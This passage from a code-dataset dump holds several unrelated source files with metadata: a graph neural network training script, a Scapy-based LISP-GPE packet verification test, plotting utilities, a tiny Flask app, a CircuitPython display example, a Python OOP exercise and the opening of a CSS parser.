configs['grand']['S']\n dropnode_rate= configs['grand']['D']\n orderr= configs['grand']['K']\n temp = configs['grand']['T']\n lam= configs['grand']['L']\n\n\n \n ### Creating an incremental Directories \n save_dir = Path(increment_path(Path(data_saveresult) / 'exp', exist_ok=args.exist_ok)) # increment run\n \n #### Creating and saving into the log file\n logsave_dir= \"./\" \n logging.basicConfig(level=logging.INFO,\n handlers=[logging.FileHandler(os.path.join(logsave_dir+model_type + '_log.txt')),\n logging.StreamHandler() ], \n format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p' \n )\n\n ####Bannering\n ascii_banner = pyfiglet.figlet_format(\"GRAND DropEdge !\")\n print(ascii_banner)\n logging.info(ascii_banner)\n \n ###### To check if cuda is available else use the cpu \n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n logging.info(f'Using: {device}')\n logging.info(\"Using seed {}.\".format(train_seedvalue))\n \n\n #### Initialize the manual seed from argument \n 
np.random.seed(train_seedvalue)\n torch.manual_seed(train_seedvalue)\n if device.type == 'cuda' :\n torch.cuda.manual_seed(train_seedvalue)\n\n ###### Data loading based on the dataset \n \n if data_type == 'cora' or data_type == 'citeseer' or data_type == 'pubmed':\n \n citedata = graphdataload.Graph_data(train_datapath,data_type,'SemiSupervised')\n citedata.load_data()\n\n adj = getattr(citedata, data_type+'_adjlist')\n features = getattr(citedata, data_type+'_features')\n labels = getattr(citedata, data_type+'_labels')\n idx_train = getattr(citedata, data_type+'_train_idx')\n idx_val = getattr(citedata, data_type+'_val_idx')\n idx_test = getattr(citedata, data_type+'_test_idx')\n edges = getattr(citedata, data_type+ '_edges')\n idx_unlabel = torch.range(idx_train.shape[0], labels.shape[0]-1, dtype=int)\n\n logging.info(\"\\n[STEP 1]: Processing {} dataset.\".format(data_type))\n logging.info(\"| # of nodes : {}\".format(adj.shape[0])) \n logging.info(\"| # of features : {}\".format(features.shape[1]))\n logging.info(\"| # of clases : {}\".format(labels.shape[1]))\n logging.info(\"| # of train set : {}\".format(len(idx_train)))\n logging.info(\"| # of val set : {}\".format(len(idx_val)))\n logging.info(\"| # of test set : {}\".format(len(idx_test)))\n logging.info(\"| # of unlabeled set : {}\".format(len(idx_unlabel)))\n\n else:\n raise NotImplementedError(data_type)\n\n logging.info(\"Dataset Used {}.\".format(data_type))\n\n\n #######Data Loading is completed \n\n ###Intialization of variables\n nclass = labels.shape[1]\n num_feats = features.shape[1]\n\n # Model and optimizer\n logging.info(\"\\n[STEP 2]: Model {} definition.\".format(model_type))\n\n model = grand(nfeat=num_feats,\n nhid=hiddim,\n nclass=nclass,\n input_droprate=ip_droprate,\n hidden_droprate=hid_droprate,\n use_bn = use_bn)\n\n # optimizer \n optimizer = optim.Adam(model.parameters(),lr=train_lr, weight_decay=train_wtdecay)\n\n\n #### Logging the details \n logging.info(\"Model Architecture Used {}.\".format(model_type)) \n logging.info(str(model))\n tot_params = sum([np.prod(p.size()) for p in model.parameters()])\n logging.info(f\"Total number of parameters: {tot_params}\")\n logging.info(f\"Number of epochs: {train_epochs}\")\n\n if device.type == 'cuda':\n model.cuda()\n features = features.cuda()\n adj = adj.cuda()\n labels = labels.cuda()\n idx_train = idx_train.cuda()\n idx_val = idx_val.cuda()\n idx_test = idx_test.cuda()\n\n train_loss_history = []\n val_loss_history = []\n train_acc_history = []\n val_acc_history = []\n bad_counter = 0\n loss_best = np.inf\n loss_mn = np.inf\n acc_best = 0.0\n acc_mx = 0.0\n best_epoch = 0\n\n # Train model\n t_total = time.time()\n logging.info(\"\\n[STEP 3]: Model {} Training for epochs {}.\".format(model_type,train_epochs))\n \n for epoch in range(train_epochs):\n to= time.time()\n train_loss,train_acc,val_loss,val_acc =train(model, optimizer, features, adj, labels, idx_train,idx_val,epoch,sample,\\\n dropnode_rate,orderr, temp , lam,edges,valmode= train_valmode)\n \n print('Epoch: {:04d}'.format(epoch+1),'loss_train: {:.4f}'.format(train_loss),'acc_train: {:.4f}'.format(train_acc),'loss_val: {:.4f}'.format(val_loss),\\\n 'acc_val: {:.4f}'.format(val_acc),'time: {:.4f}s'.format(time.time() - to))\n logging.info(\"Epoch:{:04d} loss_train:{:.4f} acc_train:{:.4f} loss_val:{:.4f} acc_val:{:.4f} time:{:.4f}s.\".format((epoch+1),\\\n (train_loss),(train_acc),(val_loss),(val_acc),(time.time()-to)))\n\n train_loss_history.append(train_loss)\n 
train_acc_history.append(train_acc)\n val_loss_history.append(val_loss)\n val_acc_history.append(val_acc) \n \n path = os.path.join(train_modelsave, '{}_{}.pkl'.format(model_type, epoch)) \n if val_loss_history[-1] <= loss_mn or val_acc_history[-1] >= acc_mx:\n if val_loss_history[-1] <= loss_best:\n loss_best = val_loss_history[-1]\n acc_best = val_acc_history[-1]\n best_epoch = epoch\n torch.save(model.state_dict(), path)\n\n loss_mn = np.min((val_loss_history[-1], loss_mn))\n acc_mx = np.max((val_acc_history[-1], acc_mx))\n bad_counter = 0\n else:\n bad_counter += 1\n\n if bad_counter == train_patience:\n print('Early stop! Min loss: ', loss_mn, ', Max accuracy: ', acc_mx)\n print('Early stop model validation loss: ', loss_best, ', accuracy: ', acc_best)\n train_epochs=epoch+1\n break\n\n for f in glob.glob(os.path.join(train_modelsave,'*.pkl')):\n epoch_nb = int(f.split(os.path.sep)[-1].split('_')[-1].split('.')[0])\n if epoch_nb < best_epoch:\n os.remove(f)\n\n print(\"Total time elapsed: {:.4f}s\".format(time.time() - t_total))\n logging.info(f\"Total Training Completed :{(time.time() - t_total)}\")\n\n for f in glob.glob(os.path.join(train_modelsave,'*.pkl')):\n epoch_nb =int(f.split(os.path.sep)[-1].split('_')[-1].split('.')[0])\n if epoch_nb > best_epoch:\n os.remove(f)\n\n if train_savefig: \n logging.info(\"\\n[STEP 3a]: Saving the Plot of Model {} Training(loss/acc)vs Validation(loss/acc).\".format(model_type))\n\n (save_dir / 'train_plot' if train_savefig else save_dir).mkdir(parents=True, exist_ok=True)\n save_path = str(save_dir / 'train_plot') \n num_epochs = range(1, train_epochs + 1)\n plot_train_val_loss(num_epochs,train_loss_history,val_loss_history,save_path)\n plot_train_val_acc(num_epochs,train_acc_history,val_acc_history,save_path)\n\n ############################################## Training Completed ##############\n ############################################## Testing Started\n print('Loading {}th epoch'.format(best_epoch))\n\n #### Loading the model with same saved format \n loadpath = os.path.join(train_modelsave, '{}_{}.pkl'.format(model_type, best_epoch)) \n model.load_state_dict(torch.load(loadpath))\n \n if test_outputviz: \n (save_dir / 'test_fig' if test_outputviz else save_dir).mkdir(parents=True, exist_ok=True)\n testsave_fig = str(save_dir / 'test_fig')\n\n logging.info(\"\\n[STEP 4]: Testing {} final model.\".format(model_type))\n\n test(model, features,adj,edges, idx_test,labels,test_outputviz,\\\n data_type,dropnode_rate,orderr,testsave_fig)\n\nif __name__ == \"__main__\":\n main()\n torch.cuda.empty_cache()\n","sub_path":"Grand_DropEdge/train_granddropedge.py","file_name":"train_granddropedge.py","file_ext":"py","file_size_in_byte":16280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
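consis_loss above sharpens the averaged prediction with temperature T (sharp_p is avg_p**(1/T), renormalized per row) and then penalizes each augmented prediction's squared distance from that sharpened target. A small numeric sketch of just the sharpening step (the probabilities are arbitrary):

import torch

avg_p = torch.tensor([[0.6, 0.3, 0.1]])
temp = 0.5
powered = avg_p.pow(1. / temp)
sharp_p = powered / powered.sum(dim=1, keepdim=True)
print(sharp_p)  # tensor([[0.7826, 0.1957, 0.0217]]): mass moves toward the argmax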
+{"seq_id":"275322119","text":"#!/usr/bin/env python3\n\n# Copyright (c) 2021 Cisco and/or its affiliates.\n#\n# SPDX-License-Identifier: Apache-2.0 OR GPL-2.0-or-later\n#\n# Licensed under the Apache License 2.0 or\n# GNU General Public License v2.0 or later; you may not use this file\n# except in compliance with one of these Licenses. You\n# may obtain a copy of the Licenses at:\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n# https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html\n#\n# Note: If this file is linked with Scapy, which is GPLv2+, your use of it\n# must be under GPLv2+. If at any point in the future it is no longer linked\n# with Scapy (or other GPLv2+ licensed software), you are free to choose\n# Apache 2.\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Traffic script that sends an ICMP/ICMPv6 packet out one interface, receives\na LISPGPE-encapsulated packet on the other interface and verifies received\npacket.\n\"\"\"\n\nimport sys\n\nfrom scapy.all import bind_layers, Packet\nfrom scapy.fields import FlagsField, BitField, XBitField, IntField\nfrom scapy.layers.inet import ICMP, IP, UDP\nfrom scapy.layers.inet6 import ICMPv6EchoRequest\nfrom scapy.layers.inet6 import IPv6, ICMPv6ND_NS, ICMPv6MLReport2, ICMPv6ND_RA\nfrom scapy.layers.l2 import Ether\nfrom scapy.packet import Raw\n\nfrom ..PacketVerifier import RxQueue, TxQueue\nfrom ..TrafficScriptArg import TrafficScriptArg\nfrom ..ValidIp import valid_ipv4, valid_ipv6\n\n\nclass LispGPEHeader(Packet):\n \"\"\"Scapy header for the Lisp GPE Layer.\"\"\"\n\n name = \"Lisp GPE Header\"\n fields_desc = [\n FlagsField(\n u\"flags\", None, 8, [u\"N\", u\"L\", u\"E\", u\"V\", u\"I\", u\"P\", u\"R\", u\"O\"]\n ),\n BitField(u\"version\", 0, size=2),\n BitField(u\"reserved\", 0, size=14),\n XBitField(u\"next_protocol\", 0, size=8),\n IntField(u\"instance_id/locator_status_bits\", 0)\n ]\n\n def guess_payload_class(self, payload):\n protocol = {\n 0x1: LispGPEInnerIP,\n 0x2: LispGPEInnerIPv6,\n 0x3: LispGPEInnerEther,\n 0x4: LispGPEInnerNSH\n }\n return protocol[self.next_protocol]\n\n\nclass LispGPEInnerIP(IP):\n \"\"\"Scapy inner LISP GPE layer for IPv4-in-IPv4.\"\"\"\n\n name = u\"Lisp GPE Inner Layer - IPv4\"\n\n\nclass LispGPEInnerIPv6(IPv6):\n \"\"\"Scapy inner LISP GPE layer for IPv6-in-IPv6.\"\"\"\n\n name = u\"Lisp GPE Inner Layer - IPv6\"\n\n\nclass LispGPEInnerEther(Ether):\n \"\"\"Scapy inner LISP GPE layer for Lisp-L2.\"\"\"\n\n name = u\"Lisp GPE Inner Layer - Ethernet\"\n\n\nclass LispGPEInnerNSH(Packet):\n \"\"\"Scapy inner LISP GPE layer for Lisp-NSH.\n\n Parsing not implemented.\n \"\"\"\n\n\ndef main():\n \"\"\"Send IP ICMP packet from one traffic generator interface to the other.\n\n :raises RuntimeError: If the received packet is not correct.\"\"\"\n\n args = TrafficScriptArg(\n [\n u\"tg_src_mac\", u\"tg_dst_mac\", u\"src_ip\", u\"dst_ip\", u\"dut_if1_mac\",\n u\"dut_if2_mac\", u\"src_rloc\", u\"dst_rloc\"\n ],\n [u\"ot_mode\"]\n )\n\n tx_src_mac = args.get_arg(u\"tg_src_mac\")\n tx_dst_mac = args.get_arg(u\"dut_if1_mac\")\n rx_dst_mac = args.get_arg(u\"tg_dst_mac\")\n rx_src_mac = args.get_arg(u\"dut_if2_mac\")\n src_ip = args.get_arg(u\"src_ip\")\n dst_ip = args.get_arg(u\"dst_ip\")\n src_rloc = 
args.get_arg(u\"src_rloc\")\n dst_rloc = args.get_arg(u\"dst_rloc\")\n tx_if = args.get_arg(u\"tx_if\")\n rx_if = args.get_arg(u\"rx_if\")\n ot_mode = args.get_arg(u\"ot_mode\")\n\n rxq = RxQueue(rx_if)\n txq = TxQueue(tx_if)\n\n pkt_raw = Ether(src=tx_src_mac, dst=tx_dst_mac)\n\n if valid_ipv4(src_ip) and valid_ipv4(dst_ip):\n pkt_raw /= IP(src=src_ip, dst=dst_ip)\n pkt_raw /= ICMP()\n ip_format = IP\n elif valid_ipv6(src_ip) and valid_ipv6(dst_ip):\n pkt_raw /= IPv6(src=src_ip, dst=dst_ip)\n pkt_raw /= ICMPv6EchoRequest()\n ip_format = IPv6\n else:\n raise ValueError(u\"IP not in correct format\")\n\n bind_layers(UDP, LispGPEHeader, dport=4341)\n\n pkt_raw /= Raw()\n sent_packets = list()\n sent_packets.append(pkt_raw)\n txq.send(pkt_raw)\n\n while True:\n if tx_if == rx_if:\n ether = rxq.recv(2, ignore=sent_packets)\n else:\n ether = rxq.recv(2)\n\n if ether is None:\n raise RuntimeError(u\"ICMP echo Rx timeout\")\n\n if ether.haslayer(ICMPv6ND_NS):\n # read another packet in the queue if the current one is ICMPv6ND_NS\n continue\n if ether.haslayer(ICMPv6ND_RA):\n # read another packet in the queue if the current one is ICMPv6ND_RA\n continue\n elif ether.haslayer(ICMPv6MLReport2):\n # read another packet in the queue if the current one is\n # ICMPv6MLReport2\n continue\n\n # otherwise process the current packet\n break\n\n if rx_dst_mac == ether[Ether].dst and rx_src_mac == ether[Ether].src:\n print(u\"MAC addresses match.\")\n else:\n raise RuntimeError(f\"Matching packet unsuccessful: {ether!r}\")\n\n ip = ether.payload\n\n if ot_mode == u\"6to4\":\n if not isinstance(ip, IP):\n raise RuntimeError(f\"Not an IP packet received {ip!r}\")\n elif ot_mode == u\"4to6\":\n if not isinstance(ip, IPv6):\n raise RuntimeError(f\"Not an IP packet received {ip!r}\")\n elif not isinstance(ip, ip_format):\n raise RuntimeError(f\"Not an IP packet received {ip!r}\")\n\n lisp = ether.getlayer(LispGPEHeader).underlayer\n if not lisp:\n raise RuntimeError(u\"Lisp layer not present or parsing failed.\")\n\n # Compare data from packets\n if src_ip == lisp.src:\n print(u\"Source IP matches source EID.\")\n else:\n raise RuntimeError(\n f\"Matching Src IP unsuccessful: {src_ip} != {lisp.src}\"\n )\n\n if dst_ip == lisp.dst:\n print(u\"Destination IP matches destination EID.\")\n else:\n raise RuntimeError(\n f\"Matching Dst IP unsuccessful: {dst_ip} != {lisp.dst}\"\n )\n\n if src_rloc == ip.src:\n print(u\"Source RLOC matches configuration.\")\n else:\n raise RuntimeError(\n f\"Matching Src RLOC unsuccessful: {src_rloc} != {ip.src}\"\n )\n\n if dst_rloc == ip.dst:\n print(u\"Destination RLOC matches configuration.\")\n else:\n raise RuntimeError(\n f\"Matching dst RLOC unsuccessful: {dst_rloc} != {ip.dst}\"\n )\n\n sys.exit(0)\n\n\nif __name__ == u\"__main__\":\n main()\n","sub_path":"GPL/traffic_scripts/lisp/lispgpe_check.py","file_name":"lispgpe_check.py","file_ext":"py","file_size_in_byte":6693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"286165593","text":"import matplotlib.patches as patches\nimport matplotlib.pyplot as plt\nimport time\n\nimport numpy as np\nfrom matplotlib.legend import Legend\n\nsendMsgId = 0\npointCnt = 5\nmaxPoint = 10\ncol = ['bo', 'ro', 'go', 'co', 'mo', 'yo', 'ko', 'wo']\nclass TagData:\n _idx = 0\n def __init__(self, tagId):\n self.locs = []\n self.idx = TagData._idx\n self.id = tagId\n self.leftCnt = 100\n self.col = col[self.idx % len(col)]\n TagData._idx += 1\n\n def update(self, loc):\n self.locs.insert(0, loc)\n if len(self.locs) > maxPoint:\n self.locs.pop()\n\n def std(self):\n a = np.array(self.locs)\n return np.std(a, axis=0)\n\nclass TagDataDict(dict):\n\n def getTagData(self, tagId):\n if tagId in self:\n ret = self[tagId]\n ret.leftCnt -= 1\n # if ret.leftCnt <= 0:\n # del self[tagId]\n return ret\n ret = TagData(tagId)\n self[tagId] = ret\n return ret\n\n def clear(self):\n toDel = filter(lambda k: self[k].leftCnt <= 0, self.keys())\n for k in toDel:\n del self[k]\n\nclass LocFig:\n def __init__(self, plt, tagDatas):\n self.plt = plt\n self.plt.close()\n self.plt.ion()\n self.fig = plt.figure()\n self.bgax = self.fig.add_subplot(1,1,1)\n self.tagDatas = tagDatas\n self.xyFormat = '{0:.2f}'\n\n def draw(self):\n self.bgax.clear()\n self.bgax.grid(True)\n self.bgax.axis(\"equal\")\n self.bgax.axis([-25, 25, -20, 20])\n self.bgax.add_patch(patches.Rectangle((-0.147, -0.179), 0.294, 0.358))\n for tagId in self.tagDatas:\n tagData = self.tagDatas.getTagData(tagId)\n x = list(map(lambda xy: xy[0], tagData.locs[-pointCnt:]))\n y = list(map(lambda xy: xy[1], tagData.locs[-pointCnt:]))\n label = tagData.std()\n label = list(map(lambda x: str(self.xyFormat.format(x)), label))\n self.bgax.plot(x, y, tagData.col, alpha = 0.7, label=str(tagId)+\" [\"+ ' '.join(label) + \"]\")\n self.bgax.text(x[0]+0.2,y[0]+0.2,[self.xyFormat.format(x[0]), self.xyFormat.format(y[0])])\n #self.bgax.legend()\n self.plt.pause(0.01)\n\nclass DisplayLoc:\n\n tagDatas = TagDataDict()\n fig = False\n def get_fig(self):\n if not self.fig:\n self.fig = LocFig(plt, self.tagDatas)\n return self.fig\n\n def display_forever(self, interval = 0.2):\n self.get_fig()\n while True:\n self.display_once()\n time.sleep(interval)\n\n def display_once(self):\n self.get_fig()\n self.fig.draw()\n self.fig.plt.pause(0.01)\n\n def update(self, tagId, xyz):\n self.tagDatas.getTagData(tagId).update(xyz)\n\nclass PhaseFig:\n def __init__(self):\n self.plt = plt\n self.plt.close()\n self.plt.ion()\n self.fig = plt.figure()\n self.plots = []\n self.format = '{0:.2f}'\n for i in range(1, 5):\n subp = self.fig.add_subplot(2, 2, i)\n # legend = Legend(padding=10, align=\"ur\")\n # legend.plots = subp\n # subp.overlays.append(legend)\n self.plots.append(self.fig.add_subplot(2, 2, i))\n\n\n def to_180_180(self, phase):\n while phase > 180:\n phase -= 360\n while phase <= -180:\n phase += 360\n return phase\n\n his_stds = [[], [], []]\n def draw(self, datas, fixes):\n if len(datas) < 3 or len(fixes) < 3:\n return\n\n tmps = []\n stds = []\n ave_stds = []\n for i in range(len(datas)):\n tmp = list(map(lambda x: self.to_180_180(x + fixes[i]), datas[i]))\n std = np.std(tmp, ddof=1)\n stds.append(std)\n tmps.append(tmp)\n\n for j in range(3):\n self.his_stds[j].append(stds[j])\n if len(self.his_stds[j]) > 10:\n self.his_stds[j].pop(0)\n ave_stds.append(np.std(self.his_stds[j], ddof=1))\n\n for i in range(3):\n plot = self.plots[i]\n plot.clear()\n data = tmps[i]\n plot.plot(range(len(data)), data, 'o')\n self.plots[3].clear()\n 
self.plots[3].text(0.1, 0.8, [\"stds:\"])\n self.plots[3].text(0.2, 0.7, list(map(self.format.format, stds)))\n self.plots[3].text(0.1, 0.6, [\"stds of stds:\"])\n self.plots[3].text(0.2, 0.5, list(map(self.format.format, ave_stds)))\n self.plots[3].text(0.1, 0.2, [\"fixes\", fixes])\n self.plt.pause(0.01)\n\n\nif __name__ == '__main__':\n print(\"test display\")\n display = DisplayLoc()\n for i in range(1000):\n display.update(123, [i, i, i])\n display.display_once()\n time.sleep(0.5)\n\n","sub_path":"display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":4763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
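to_180_180 wraps an arbitrary phase angle into the half-open interval (-180, 180] before the standard deviations are taken, so that angles like 359 and 1 degree end up 2 degrees apart rather than 358. A standalone restatement with spot checks:

def to_180_180(phase):
    while phase > 180:
        phase -= 360
    while phase <= -180:
        phase += 360
    return phase

print(to_180_180(270))   # -> -90
print(to_180_180(-185))  # -> 175
print(to_180_180(180))   # -> 180 (the upper bound is kept)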
+{"seq_id":"401838066","text":"import os\nfrom flask import Flask, render_template\napp = Flask(__name__, static_folder='static')\n\n@app.route('/', methods=['GET'])\ndef index_page_landing():\n video_name = os.listdir('./res/frontend/static/emotion')\n print (video_name)\n return render_template('index.html', video_name=video_name)\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=2000)","sub_path":"res/frontend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"379515302","text":"import displayio\nfrom os import uname\nif uname()[0] == 'samd51':\n import board\nelse:\n from blinka_displayio_pygamedisplay import PyGameDisplay\nfrom adafruit_display_text import label\nfrom adafruit_bitmap_font import bitmap_font\n\nif uname()[0] == 'samd51':\n display= board.DISPLAY\nelse:\n display = PyGameDisplay(width=320, height=240)\nmain_group = displayio.Group(max_size=100)\nfont_name = \"fonts/LibreBodoniv2002-Bold-10.bdf\"\nMEDIUM_FONT = bitmap_font.load_font(\"fonts/LibreBodoniv2002-Bold-10.bdf\")\nBIG_FONT = bitmap_font.load_font(\"fonts/LibreBodoniv2002-Bold-27.bdf\")\nTIME_PAUSE = 2\n\nbitmap = displayio.Bitmap(4, 320, 2)\npalette = displayio.Palette(2)\npalette[0] = 0x004400\npalette[1] = 0x00FFFF\nhorizontal_line = displayio.TileGrid(bitmap,\n pixel_shader=palette,\n x=155,\n y=0)\nmain_group.append(horizontal_line)\n\nbitmap = displayio.Bitmap(320, 4, 2)\nvertica_line = displayio.TileGrid(bitmap,\n pixel_shader=palette,\n x=0,\n y=110)\nmain_group.append(vertica_line)\n\ntext_initial_specs = label.Label(MEDIUM_FONT,\n text=\"CircuitPython\",\n x=display.width // 2,\n y=display.height // 2,\n padding_right=10,\n padding_top=10,\n padding_bottom=10,\n padding_left=10,\n anchored_position=(display.width // 2, display.height // 2),\n anchor_point=(0.5, 0.5),\n theme=\"MAGTAG\",\n )\nmain_group.append(text_initial_specs)\n\n\ntext_initial_specs2 = label.Label(MEDIUM_FONT,\n text=\"CircuitPython\",\n x=display.width // 2,\n y=display.height // 2,\n color=0x44FF44,\n background_color=990099,\n padding_right=10,\n padding_top=10,\n padding_bottom=10,\n padding_left=10,\n anchored_position=(display.width // 2, (display.height // 2)+30),\n anchor_point=(0.5, 0.5),\n )\nmain_group.append(text_initial_specs2)\ndisplay.show(main_group)\n\nwhile True:\n pass","sub_path":"example_label_themed.py","file_name":"example_label_themed.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"500990347","text":"# -*- coding: utf-8 -*-\n\n'''\nЗадание 26.1a\n\nВ этом задании надо сделать так, чтобы экземпляры класса Topology были итерируемыми объектами.\nОснову класса Topology можно взять из любого задания 25.1x или задания 26.1.\n\nПосле создания экземпляра класса, экземпляр должен работать как итерируемый объект.\nНа каждой итерации должен возвращаться кортеж, который описывает одно соединение.\nПорядок вывода соединений может быть любым.\n\n\nПример работы класса:\n\nIn [1]: top = Topology(topology_example)\n\nIn [2]: for link in top:\n ...: print(link)\n ...:\n(('R1', 'Eth0/0'), ('SW1', 'Eth0/1'))\n(('R2', 'Eth0/0'), ('SW1', 'Eth0/2'))\n(('R2', 'Eth0/1'), ('SW2', 'Eth0/11'))\n(('R3', 'Eth0/0'), ('SW1', 'Eth0/3'))\n(('R3', 'Eth0/1'), ('R4', 'Eth0/0'))\n(('R3', 'Eth0/2'), ('R5', 'Eth0/0'))\n\n\nПроверить работу класса.\n'''\nclass Topology:\n def __init__(self, top):\n self.res = {}\n for key,value in top.items():\n if value not in self.res.keys():\n self.res[key] = value\n self.topology = self.res\n\n def __add__(self, other):\n out = self.res.copy()\n out.update(other.res)\n output = Topology(out)\n return output\n\n def getitem(self, index):\n print('Вызываю __getitem__')\n return self.res.items()\n\n def __iter__(self):\n print('Вызываю __iter__')\n return iter(self.res.items())\n\ntopology_example = {('R1', 'Eth0/0'): ('SW1', 'Eth0/1'),\n ('R2', 'Eth0/0'): ('SW1', 'Eth0/2'),\n ('R2', 'Eth0/1'): ('SW2', 'Eth0/11'),\n ('R3', 'Eth0/0'): ('SW1', 'Eth0/3'),\n ('R3', 'Eth0/1'): ('R4', 'Eth0/0'),\n ('R3', 'Eth0/2'): ('R5', 'Eth0/0'),\n ('SW1', 'Eth0/1'): ('R1', 'Eth0/0'),\n ('SW1', 'Eth0/2'): ('R2', 'Eth0/0'),\n ('SW1', 'Eth0/3'): ('R3', 'Eth0/0')}\n\n\n","sub_path":"exercises/26_oop_special_methods/task_26_1a.py","file_name":"task_26_1a.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"243420290","text":"# -*- coding: utf-8 -*-\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# ~ Copyright (C) 2002-2004 TechGame Networks, LLC.\n# ~\n# ~ This library is free software; you can redistribute it and/or\n# ~ modify it under the terms of the BSD style License as found in the\n# ~ LICENSE file included with this distribution.\n#\n# Modified by Dirk Holtwick , 2007-2008\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n\"\"\"\nCSS-2.1 parser\n~~~~~~~~~~~~~~\n\nThe CSS 2.1 Specification this parser was derived from can be found at http://www.w3.org/TR/CSS21/\n\nPrimary Classes:\n * CSSParser\n Parses CSS source forms into results using a Builder Pattern. Must\n provide concrete implementation of CSSBuilderAbstract.\n\n * CSSBuilderAbstract\n Outlines the interface between CSSParser and it's rule-builder.\n Compose CSSParser with a concrete implementation of the builder to get\n usable results from the CSS parser.\n\nDependencies:\n python 2.3 (or greater)\n re\n\"\"\"\n\nimport re\nimport six\n\nfrom xhtml2pdf.w3c.cssSpecial import cleanup_css\n\n\ndef is_at_rule_ident(src, ident):\n \"\"\"\n\n :param src:\n :param ident:\n :return:\n \"\"\"\n return re.match(r'^@' + ident + r'\\s*', src)\n\n\ndef strip_at_rule_ident(src):\n \"\"\"\n\n :param src:\n :return:\n \"\"\"\n return re.sub(r'^@[a-z\\-]+\\s*', '', src)\n\n\nclass CSSSelectorAbstract(object):\n \"\"\"Outlines the interface between CSSParser and it's rule-builder for selectors.\n\n CSSBuilderAbstract.selector and CSSBuilderAbstract.combineSelectors must\n return concrete implementations of this abstract.\n\n See css.CSSMutableSelector for an example implementation.\n \"\"\"\n def add_hash_id(self, hashId):\n raise NotImplementedError('Subclass responsibility')\n\n def add_class(self, class_):\n raise NotImplementedError('Subclass responsibility')\n\n def add_attribute(self, attrName):\n raise NotImplementedError('Subclass responsibility')\n\n def add_attribute_operation(self, attrName, op, attrValue):\n raise NotImplementedError('Subclass responsibility')\n\n def add_pseudo(self, name):\n raise NotImplementedError('Subclass responsibility')\n\n def add_pseudo_function(self, name, value):\n raise NotImplementedError('Subclass responsibility')\n\n\nclass CSSBuilderAbstract(object):\n \"\"\"\n Outlines the interface between CSSParser and it's rule-builder. 
Compose\n CSSParser with a concrete implementation of the builder to get usable\n results from the CSS parser.\n\n See css.CSSBuilder for an example implementation\n \"\"\"\n def set_charset(self, charset):\n raise NotImplementedError('Subclass responsibility')\n\n # ~ css results ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n def begin_stylesheet(self):\n raise NotImplementedError('Subclass responsibility')\n\n def stylesheet(self, elements):\n raise NotImplementedError('Subclass responsibility')\n\n def end_stylesheet(self):\n raise NotImplementedError('Subclass responsibility')\n\n def begin_inline(self):\n raise NotImplementedError('Subclass responsibility')\n\n def inline(self, declarations):\n raise NotImplementedError('Subclass responsibility')\n\n def end_inline(self):\n raise NotImplementedError('Subclass responsibility')\n\n def ruleset(self, selectors, declarations):\n raise NotImplementedError('Subclass responsibility')\n\n # ~ css namespaces ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n def resolve_namespace_prefix(self, nsPrefix, name):\n raise NotImplementedError('Subclass responsibility')\n\n # ~ css @ directives ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n def at_charset(self, charset):\n raise NotImplementedError('Subclass responsibility')\n\n def at_import(self, import_, mediums, cssParser):\n raise NotImplementedError('Subclass responsibility')\n\n def at_namespace(self, nsPrefix, uri):\n raise NotImplementedError('Subclass responsibility')\n\n def at_media(self, mediums, ruleset):\n raise NotImplementedError('Subclass responsibility')\n\n def at_page(self, page, pseudopage, declarations):\n raise NotImplementedError('Subclass responsibility')\n\n def at_font_face(self, declarations):\n raise NotImplementedError('Subclass responsibility')\n\n def at_ident(self, atIdent, cssParser, src):\n return src, NotImplemented\n\n # ~ css selectors ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n def combine_selectors(self, selectorA, combiner, selectorB):\n \"\"\"Return value must implement CSSSelectorAbstract\"\"\"\n raise NotImplementedError('Subclass responsibility')\n\n def selector(self, name):\n \"\"\"Return value must implement CSSSelectorAbstract\"\"\"\n raise NotImplementedError('Subclass responsibility')\n\n # ~ css declarations ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n def property(self, name, value, important=False):\n raise NotImplementedError('Subclass responsibility')\n\n def combine_terms(self, termA, combiner, termB):\n raise NotImplementedError('Subclass responsibility')\n\n def term_ident(self, value):\n raise NotImplementedError('Subclass responsibility')\n\n def term_number(self, value, units=None):\n raise NotImplementedError('Subclass responsibility')\n\n def term_rgb(self, value):\n raise NotImplementedError('Subclass responsibility')\n\n def term_uri(self, value):\n raise NotImplementedError('Subclass responsibility')\n\n def term_string(self, value):\n raise NotImplementedError('Subclass responsibility')\n\n def term_unicode_range(self, value):\n raise NotImplementedError('Subclass responsibility')\n\n def term_function(self, name, value):\n raise NotImplementedError('Subclass responsibility')\n\n def term_unknown(self, src):\n raise NotImplementedError('Subclass responsibility')\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# ~ CSS Parser\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nclass 